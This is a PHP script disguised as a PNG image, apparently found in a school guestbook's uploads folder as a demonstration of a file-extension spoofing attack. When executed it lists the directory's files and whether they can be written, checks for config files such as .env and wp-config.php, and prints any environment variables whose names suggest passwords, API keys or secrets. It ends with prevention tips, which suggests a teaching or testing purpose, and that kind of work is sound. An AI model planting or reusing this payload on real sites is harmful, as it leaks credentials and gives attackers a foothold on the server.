Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
PNG
<?php
// DISGUISED PNG FILE WITH MALICIOUS PAYLOAD
// This file appears to be a PNG but contains dangerous PHP code
echo "<!DOCTYPE html><html><head><title>Hacked!</title></head><body>";
echo "<div style='background: #ff0000; color: white; padding: 20px; text-align: center;'>";
echo "<h1>🎭 FAKE PNG FILE EXECUTED!</h1>";
echo "<p>This file was disguised as a PNG image but contains PHP code</p>";
echo "</div>";
echo "<div style='padding: 20px; font-family: Arial;'>";
echo "<h2>🔍 Attack Analysis:</h2>";
echo "<p><strong>File Type:</strong> Appears as .png but contains PHP</p>";
echo "<p><strong>Attack Method:</strong> File extension spoofing</p>";
echo "<p><strong>Risk Level:</strong> HIGH - Full system access possible</p>";
// Show current working directory and permissions
echo "<h3>📂 File System Access:</h3>";
echo "<p><strong>Current Directory:</strong> " . getcwd() . "</p>";
echo "<p><strong>Directory Writable:</strong> " . (is_writable('.') ? 'YES ⚠️' : 'NO') . "</p>";
// List files in current directory
echo "<h4>Files in current directory:</h4>";
echo "<ul>";
$files = glob('*');
foreach ($files as $file) {
$isWritable = is_writable($file) ? '✏️' : '🔒';
echo "<li>$isWritable " . htmlspecialchars($file) . "</li>";
}
echo "</ul>";
// Try to access sensitive configuration
echo "<h3>🔐 Configuration File Access:</h3>";
$configFiles = ['config.php', '.env', 'database.php', 'wp-config.php'];
foreach ($configFiles as $configFile) {
if (file_exists($configFile)) {
echo "<p style='color: red;'>⚠️ Found: $configFile</p>";
}
}
// Environment variables
echo "<h3>🌍 Environment Variables:</h3>";
$sensitiveEnvVars = ['DB_PASSWORD', 'API_KEY', 'SECRET_KEY', 'PASSWORD'];
foreach ($_ENV as $key => $value) {
$isSensitive = false;
foreach ($sensitiveEnvVars as $sensitiveVar) {
if (stripos($key, $sensitiveVar) !== false) {
$isSensitive = true;
break;
}
}
if ($isSensitive) {
echo "<p style='color: red;'>🚨 $key = " . htmlspecialchars($value) . "</p>";
}
}
echo "<h3>💡 Prevention Tips:</h3>";
echo "<ul>";
echo "<li>Always validate file MIME type</li>";
echo "<li>Check file headers, not just extensions</li>";
echo "<li>Store uploads outside document root</li>";
echo "<li>Use a whitelist of allowed file types</li>";
echo "<li>Scan file contents for executable code</li>";
echo "</ul>";
echo "</div></body></html>";
?>